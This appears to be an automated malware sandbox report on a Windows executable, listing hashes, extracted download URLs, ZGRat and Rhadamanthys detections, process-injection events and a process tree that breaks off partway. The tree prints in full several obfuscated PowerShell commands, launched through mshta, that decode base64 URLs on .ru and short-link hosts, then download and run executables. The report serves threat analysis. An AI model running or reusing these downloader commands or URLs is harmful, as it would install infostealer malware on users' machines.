Overview
overview
10Static
static
10076be2c09b...29.exe
windows11-21h2-x64
100fd2b5dba8...d1.exe
windows11-21h2-x64
10131d6fb920...b1.exe
windows11-21h2-x64
101c133b9bb4...fd.exe
windows11-21h2-x64
1030af8d3ec6...30.exe
windows11-21h2-x64
1041c9d28653...f5.exe
windows11-21h2-x64
105a0daa24b5...1f.exe
windows11-21h2-x64
630efa1e2d...ad.exe
windows11-21h2-x64
10651bc82076...73.exe
windows11-21h2-x64
677bea9e71...58.exe
windows11-21h2-x64
107afefba65e...bb.exe
windows11-21h2-x64
3817c226e42...db.dll
windows11-21h2-x64
8a925fc1289...42.exe
windows11-21h2-x64
7b1c5fd5c0f...ae.exe
windows11-21h2-x64
10f2923f695d...7d.msi
windows11-21h2-x64
10f58d2071a2...e1.exe
windows11-21h2-x64
7Analysis
-
max time kernel
612s -
max time network
629s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-12-2023 01:43
Behavioral task
behavioral1
Sample
076be2c09b944ec56381f42405728f7f657d2597b6e27191354568fb70170b29.exe
Resource
win11-20231215-en
Behavioral task
behavioral2
Sample
0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
Resource
win11-20231215-en
Behavioral task
behavioral3
Sample
131d6fb9204ceda508075afce9b9b65e429952674e914d224268deb319a0aab1.exe
Resource
win11-20231215-en
Behavioral task
behavioral4
Sample
1c133b9bb476879df8145370ce1069ec92f28cade85a839e0159158a3e1b1afd.exe
Resource
win11-20231215-en
Behavioral task
behavioral5
Sample
30af8d3ec685a4a5669f1377bb74589772a0428d9daa214c179a795dcf4b9030.exe
Resource
win11-20231215-en
Behavioral task
behavioral6
Sample
41c9d28653704e628d8dd20e5f65a298242072156a31bc5fe0e24a1f4c640af5.exe
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
5a0daa24b5748d81ba0bb78d7f2b50eb4c387ffe679c92c1462f7dec586adb1f.exe
Resource
win11-20231215-en
Behavioral task
behavioral8
Sample
630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad.exe
Resource
win11-20231215-en
Behavioral task
behavioral9
Sample
651bc82076659431e06327aeb3aacef2c30bf3cfd43ae4f9bc6b4222f15bb673.exe
Resource
win11-20231215-en
Behavioral task
behavioral10
Sample
677bea9e71aa3a56fe62a20580eb0786431a4789cb340a7294eb243054191c58.exe
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
7afefba65e72f42925ba76fae9ea98286eff7d0d01dcccd07c6117384858b6bb.exe
Resource
win11-20231215-en
Behavioral task
behavioral12
Sample
817c226e42f5c503325288fd8273bc03b326590f457e7a589eb34c2792d0a5db.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
a925fc1289573f01bb86482e38340f0fe431269aa7500d776713c71091c49142.exe
Resource
win11-20231215-en
Behavioral task
behavioral14
Sample
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
f2923f695dc02132cea5c0241060dba9a35d317342675118f7b22288e78cee7d.msi
Resource
win11-20231215-en
Behavioral task
behavioral16
Sample
f58d2071a2fdaea27d814e788e002fe5da63843546f22c255eceade162323ce1.exe
Resource
win11-20231215-en
General
-
Target
0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
-
Size
210KB
-
MD5
8e84fa4f3e50e2bdc357c348b923a8b4
-
SHA1
8ccc6b05df9cd2ab9275e2848a997176b3cd41c8
-
SHA256
0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1
-
SHA512
cab0b936c6834068a94d55a7c3172b3b27766ddd41d5422ec2e4b1f2c0f39fa12f1258c4dc5483f061b635976ce398b91d274fbab812b64657ea3eb06e5dc81c
-
SSDEEP
3072:NWEv+PTBTYm7BsOzKSU2pr1RJoutgYdNC1W:NWEvMlTb7GyrLJoShdNn
Malware Config
Extracted
http://bratiop.ru/asdfg.exe
http://bratiop.ru/asdfg.exe
Signatures
-
Detect ZGRat V1 30 IoCs
resource yara_rule behavioral2/memory/244-188-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-190-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-194-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-196-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-198-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-200-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-202-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-204-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-206-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-208-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-210-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-212-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-216-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-218-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-220-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-214-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-222-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-224-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-226-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-228-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-232-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-238-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-244-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-246-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-248-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-242-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-240-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-236-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-234-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 behavioral2/memory/244-230-0x00000000054A0000-0x0000000005580000-memory.dmp family_zgrat_v1 -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4924 created 2664 4924 icw.exe 21 -
Blocklisted process makes network request 5 IoCs
flow pid Process 4 3296 powershell.exe 5 544 powershell.exe 6 2080 powershell.exe 7 1952 powershell.exe 8 4004 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
pid Process 2028 patch.exe 3864 icw.exe 3916 BLduscfibj.exe 4924 icw.exe 244 BLduscfibj.exe 2816 StringIds.exe 3948 StringIds.exe 4148 akugwl.exe 1140 akugwl.exe 3804 SupportsDynamicPartitions.exe 2724 SupportsDynamicPartitions.exe 3852 SupportsDynamicPartitions.exe 4244 SupportsDynamicPartitions.exe -
resource yara_rule behavioral2/memory/4744-0-0x0000000000400000-0x00000000004A6000-memory.dmp upx behavioral2/memory/4744-34-0x0000000000400000-0x00000000004A6000-memory.dmp upx -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 3864 set thread context of 4924 3864 icw.exe 101 PID 3916 set thread context of 244 3916 BLduscfibj.exe 103 PID 2816 set thread context of 3948 2816 StringIds.exe 114 PID 3948 set thread context of 3816 3948 StringIds.exe 115 PID 3816 set thread context of 1536 3816 InstallUtil.exe 116 PID 4148 set thread context of 1140 4148 akugwl.exe 120 PID 3804 set thread context of 2724 3804 SupportsDynamicPartitions.exe 124 PID 2724 set thread context of 2588 2724 SupportsDynamicPartitions.exe 125 PID 2588 set thread context of 4804 2588 aspnet_compiler.exe 126 PID 4804 set thread context of 2544 4804 aspnet_compiler.exe 128 PID 3852 set thread context of 4244 3852 SupportsDynamicPartitions.exe 133 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4384 4924 WerFault.exe 101 3728 4924 WerFault.exe 101 -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1199853020-417986905-91977573-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3296 powershell.exe 3296 powershell.exe 544 powershell.exe 544 powershell.exe 4400 powershell.exe 4400 powershell.exe 2080 powershell.exe 2080 powershell.exe 4004 powershell.exe 4004 powershell.exe 1952 powershell.exe 1952 powershell.exe 544 powershell.exe 4004 powershell.exe 1952 powershell.exe 2080 powershell.exe 4400 powershell.exe 3296 powershell.exe 4924 icw.exe 4924 icw.exe 1428 dialer.exe 1428 dialer.exe 1428 dialer.exe 1428 dialer.exe 5108 powershell.exe 5108 powershell.exe 3948 StringIds.exe 3948 StringIds.exe 3456 powershell.exe 3456 powershell.exe 2964 powershell.exe 2964 powershell.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe 4804 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4804 aspnet_compiler.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 684 Process not Found -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 3296 powershell.exe Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 544 powershell.exe Token: SeDebugPrivilege 3864 icw.exe Token: SeDebugPrivilege 3916 BLduscfibj.exe Token: SeDebugPrivilege 244 BLduscfibj.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 2816 StringIds.exe Token: SeDebugPrivilege 3948 StringIds.exe Token: SeDebugPrivilege 3816 InstallUtil.exe Token: SeDebugPrivilege 1536 InstallUtil.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 4148 akugwl.exe Token: SeDebugPrivilege 1140 akugwl.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 3804 SupportsDynamicPartitions.exe Token: SeDebugPrivilege 2724 SupportsDynamicPartitions.exe Token: SeDebugPrivilege 2588 aspnet_compiler.exe Token: SeDebugPrivilege 4804 aspnet_compiler.exe Token: SeLockMemoryPrivilege 2544 AddInProcess.exe Token: SeLockMemoryPrivilege 2544 AddInProcess.exe Token: SeDebugPrivilege 3852 SupportsDynamicPartitions.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2544 AddInProcess.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4744 wrote to memory of 4968 4744 0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe 77 PID 4744 wrote to memory of 4968 4744 0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe 77 PID 4744 wrote to memory of 4968 4744 0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe 77 PID 4968 wrote to memory of 3868 4968 cmd.exe 81 PID 4968 wrote to memory of 3868 4968 cmd.exe 81 PID 4968 wrote to memory of 3868 4968 cmd.exe 81 PID 4968 wrote to memory of 424 4968 cmd.exe 82 PID 4968 wrote to memory of 424 4968 cmd.exe 82 PID 4968 wrote to memory of 424 4968 cmd.exe 82 PID 4968 wrote to memory of 3892 4968 cmd.exe 83 PID 4968 wrote to memory of 3892 4968 cmd.exe 83 PID 4968 wrote to memory of 3892 4968 cmd.exe 83 PID 4968 wrote to memory of 4204 4968 cmd.exe 84 PID 4968 wrote to memory of 4204 4968 cmd.exe 84 PID 4968 wrote to memory of 4204 4968 cmd.exe 84 PID 4968 wrote to memory of 4440 4968 cmd.exe 85 PID 4968 wrote to memory of 4440 4968 cmd.exe 85 PID 4968 wrote to memory of 4440 4968 cmd.exe 85 PID 4968 wrote to memory of 2388 4968 cmd.exe 86 PID 4968 wrote to memory of 2388 4968 cmd.exe 86 PID 4968 wrote to memory of 2388 4968 cmd.exe 86 PID 4968 wrote to memory of 2028 4968 cmd.exe 87 PID 4968 wrote to memory of 2028 4968 cmd.exe 87 PID 2388 wrote to memory of 4400 2388 mshta.exe 88 PID 2388 wrote to memory of 4400 2388 mshta.exe 88 PID 2388 wrote to memory of 4400 2388 mshta.exe 88 PID 4204 wrote to memory of 1952 4204 mshta.exe 95 PID 4204 wrote to memory of 1952 4204 mshta.exe 95 PID 4204 wrote to memory of 1952 4204 mshta.exe 95 PID 424 wrote to memory of 4004 424 mshta.exe 96 PID 424 wrote to memory of 4004 424 mshta.exe 96 PID 424 wrote to memory of 4004 424 mshta.exe 96 PID 3868 wrote to memory of 3296 3868 mshta.exe 93 PID 3868 wrote to memory of 3296 3868 mshta.exe 93 PID 3868 wrote to memory of 3296 3868 mshta.exe 93 PID 4440 wrote to memory of 2080 4440 mshta.exe 90 PID 4440 wrote to memory of 2080 4440 mshta.exe 90 PID 4440 wrote to memory of 2080 4440 mshta.exe 90 PID 3892 wrote to memory of 544 3892 mshta.exe 91 PID 3892 wrote to memory of 544 3892 mshta.exe 91 PID 3892 wrote to memory of 544 3892 mshta.exe 91 PID 4004 wrote to memory of 3864 4004 powershell.exe 100 PID 4004 wrote to memory of 3864 4004 powershell.exe 100 PID 4004 wrote to memory of 3864 4004 powershell.exe 100 PID 3864 wrote to memory of 3916 3864 icw.exe 102 PID 3864 wrote to memory of 3916 3864 icw.exe 102 PID 3864 wrote to memory of 3916 3864 icw.exe 102 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3864 wrote to memory of 4924 3864 icw.exe 101 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 PID 3916 wrote to memory of 244 3916 BLduscfibj.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2664
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1428
-
-
C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D13A.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3296
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Users\Public\icw.exe"C:\Users\Public\icw.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Users\Public\icw.exeC:\Users\Public\icw.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4924 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 4487⤵
- Program crash
PID:4384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 5007⤵
- Program crash
PID:3728
-
-
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:244
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D13A.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
